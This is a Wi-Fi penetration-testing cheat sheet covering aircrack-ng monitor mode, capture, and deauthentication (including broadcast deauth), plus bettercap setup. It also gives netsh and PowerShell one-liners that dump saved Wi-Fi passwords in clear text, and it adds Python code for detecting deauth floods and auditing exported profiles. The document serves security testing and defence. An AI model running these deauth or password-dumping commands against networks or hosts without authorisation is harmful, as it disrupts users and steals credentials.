Basic stuff

List the wireless PHYs with the interface modes, bands and channels each one supports:

iw list

Start chipset in monitor mode

First try to start your interface in monitor mode without running "airmon-ng check kill" (which stops NetworkManager, wpa_supplicant and the other processes that could interfere). It is often enough to ask NetworkManager to leave the interface alone.

Ask NetworkManager to not manage your interface

nmcli dev set <interface> managed no

Monitor mode

airmon-ng check
airmon-ng check kill
airmon-ng start <wlan1> <channel>

Stop monitor mode

airmon-ng stop <wlan1mon>
service network-manager start

Capture traffic

airodump-ng <wlan1mon>
airodump-ng <wlan1mon> --band <abg>
airodump-ng <wlan1mon> -c <channel> --bssid <bssid> -w <out>

Only show supplicants associated to a specific BSSID (-a filters out unassociated clients)

airodump-ng <wlan1mon> -c <channel> --bssid <bssid> -a


Bettercap setup

Download the zip, then install the build dependencies:

apt install golang libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev

Update the caplets (and the web UI), then quit:

/opt/bettercap -eval "caplets.update; q"
/opt/bettercap -eval "caplets.update; ui.update; q"

Run it with the web UI caplet:

/opt/bettercap -caplet "http-ui"

One packet for association

aireplay-ng -1 0 -e <ESSID> -a <ap_mac> -h <chipset_mac> <wlan1mon>

Association with keep-alive

aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <ap_mac> -h <chipset_mac> <wlan1mon>

Deauthenticate a specific supplicant

aireplay-ng -0 <nb_deauth> -a <ap_mac> -c <supplicant_mac> <wlan1mon>

Deauthenticate with broadcast address

aireplay-ng -0 20 -a <ap_mac> -c FF:FF:FF:FF:FF:FF <wlan1mon>
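The defensive counterpart of the deauthentication commands above is spotting them on the air. The following is an added example, not part of the original cheat sheet: it parses the 802.11 MAC header of raw frames (as captured on a monitor-mode interface, without the radiotap header), counts deauthentication frames per sender/receiver pair and flags pairs that exceed a threshold. The addresses, the frames and the threshold are constructed for the example; in practice the frames would come from a pcap or a live monitor interface.

```python
# Added example: 802.11 deauthentication flood detector over raw frames.
# Not code from the original cheat sheet; sample frames are constructed.
import struct
from collections import Counter

TYPE_MGMT = 0          # 802.11 frame type 0 = management
SUBTYPE_DEAUTH = 12    # management subtype 12 = deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(part, 16) for part in text.split(":"))


def parse_frame(frame: bytes) -> dict:
    """Decode the 24-byte 802.11 MAC header; for deauth frames also read the reason code."""
    if len(frame) < 24:
        raise ValueError("frame shorter than a 24-byte 802.11 header")
    fc = frame[0]                      # first frame-control byte: version | type | subtype
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    info = {
        "type": ftype,
        "subtype": subtype,
        "dst": mac_str(frame[4:10]),   # address 1: receiver
        "src": mac_str(frame[10:16]),  # address 2: transmitter
        "bssid": mac_str(frame[16:22]),
        "reason": None,
    }
    if ftype == TYPE_MGMT and subtype == SUBTYPE_DEAUTH and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]  # deauth body: reason code
    return info


def detect_deauth_flood(frames, threshold: int = 10) -> list:
    """Return one alert per (src, dst) pair that sent at least `threshold` deauth frames."""
    counts = Counter()
    for frame in frames:
        info = parse_frame(frame)
        if info["type"] == TYPE_MGMT and info["subtype"] == SUBTYPE_DEAUTH:
            counts[(info["src"], info["dst"])] += 1
    alerts = []
    for (src, dst), n in sorted(counts.items()):
        if n >= threshold:
            alerts.append({"src": src, "dst": dst, "count": n, "broadcast": dst == BROADCAST})
    return alerts


def build_deauth(dst: str, src: str, bssid: str, reason: int = 7) -> bytes:
    """Construct a deauthentication frame for the sample input (0xC0 = type 0, subtype 12)."""
    header = struct.pack("<BBH", 0xC0, 0x00, 0)       # frame control, flags, duration
    header += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    header += struct.pack("<H", 0)                    # sequence control
    return header + struct.pack("<H", reason)         # body: reason code


# Constructed sample: one AP address sending 20 broadcast deauths and one targeted
# deauth, plus a beacon header (0x80 = type 0, subtype 8) that must be ignored.
AP = "00:11:22:33:44:55"
STA = "66:77:88:99:aa:bb"
SAMPLE_FRAMES = (
    [build_deauth(BROADCAST, AP, AP) for _ in range(20)]
    + [build_deauth(STA, AP, AP)]
    + [struct.pack("<BBH", 0x80, 0x00, 0) + mac_bytes(BROADCAST) + mac_bytes(AP)
       + mac_bytes(AP) + b"\x00\x00"]
)

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES, threshold=10):
        print(alert)
```

The sample counts over the whole batch; on live traffic the counter should be windowed over time (deauths per second per pair) so that a legitimate AP kicking a single client does not trip it. The mitigation on the network side is 802.11w Protected Management Frames, which makes stations reject forged deauthentication and disassociation frames; WPA3 requires it.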

Decrypt capture files

For WPA/WPA2 encryption, the capture must contain at least messages 2 and 3, or 3 and 4, of the 4-way handshake.

airdecap-ng -e <essid> -p <PSK> (-b <ap_mac>) <cap_file>

Repeat frames from one monitor interface to another (airtun-ng repeater mode)

airtun-ng -a <ap_mac_source> --repeat (--bssid <ap_mac_source_filtering>) -i <mon0_source> <mon1_dest>

Get Wi-Fi passwords from a host

Exporting the profiles does not need administrator privileges on Windows 10, but a profile's PSK can be stored protected, in which case administrator privileges are required to get the clear-text PSK.

Export all information in XML files in a folder

netsh wlan export profile folder=<C:\Windows\Temp> key=clear
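Once the profiles are exported, the XML files can be audited rather than read by eye. The following is an added example, not part of the original cheat sheet: it parses each exported profile, reports the authentication and encryption in use, and flags profiles whose key is present in clear text (or marked protected, which is the case the note above describes) without printing any key. The element names follow the WLAN profile schema that Windows writes; the two documents and the network names below are constructed samples.

```python
# Added example: audit of "netsh wlan export profile" XML files.
# Not code from the original cheat sheet; sample profiles are constructed.
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"p": "http://www.microsoft.com/networking/WLAN/profile/v1"}
WEAK_AUTH = {"open", "shared", "WPA", "WPAPSK"}   # open, WEP shared key, WPA1
WEAK_ENC = {"none", "WEP", "TKIP"}


def audit_profile_xml(xml_text: str) -> dict:
    """Summarise one exported profile and list its findings (never returns the key itself)."""
    root = ET.fromstring(xml_text)

    def text(path: str) -> str:
        return root.findtext(path, default="", namespaces=NS)

    auth = text("p:MSM/p:security/p:authEncryption/p:authentication")
    enc = text("p:MSM/p:security/p:authEncryption/p:encryption")
    key = root.find("p:MSM/p:security/p:sharedKey", NS)
    has_key = key is not None and key.find("p:keyMaterial", NS) is not None
    protected = key is not None and key.findtext("p:protected", default="false", namespaces=NS) == "true"

    findings = []
    if auth in WEAK_AUTH or enc in WEAK_ENC:
        findings.append(f"weak security: {auth}/{enc}")
    if has_key and not protected:
        findings.append("clear-text key present in export")
    if has_key and protected:
        findings.append("key stored protected; admin rights needed to export it in clear")
    return {
        "name": text("p:name"),
        "ssid": text("p:SSIDConfig/p:SSID/p:name"),
        "auth": auth,
        "enc": enc,
        "findings": findings,
    }


def audit_folder(folder) -> list:
    """Audit every *.xml file in the folder given to netsh wlan export profile."""
    return [audit_profile_xml(p.read_text(encoding="utf-8"))
            for p in sorted(Path(folder).glob("*.xml"))]


# Constructed sample 1: WPA2-PSK profile exported with key=clear and an unprotected key.
SAMPLE_WPA2 = """<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>HomeNet</name>
  <SSIDConfig><SSID><name>HomeNet</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType><protected>false</protected><keyMaterial>example-passphrase</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>"""

# Constructed sample 2: an open network with no key material at all.
SAMPLE_OPEN = """<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>CafeFree</name>
  <SSIDConfig><SSID><name>CafeFree</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <MSM><security>
    <authEncryption>
      <authentication>open</authentication><encryption>none</encryption><useOneX>false</useOneX>
    </authEncryption>
  </security></MSM>
</WLANProfile>"""

if __name__ == "__main__":
    for sample in (SAMPLE_WPA2, SAMPLE_OPEN):
        print(audit_profile_xml(sample))
```

Run audit_folder() against the export directory (the C:\Windows\Temp placeholder above) to get one record per profile; the "clear-text key present" finding is the reason such an export directory should be deleted once it has served its purpose.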

Print known PSK (PowerShell)

netsh wlan show profiles|Select-String -Pattern " User Profile"|ForEach-Object{echo $_.Line.split(':')[1].trim()}|ForEach-Object{netsh wlan show profiles name=$_ key=clear}|Select-String -Pattern "Key Content|S$"

Print known PSK (cmd one-liner)

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

Delete profiles

netsh wlan show profiles
netsh wlan delete profile name=*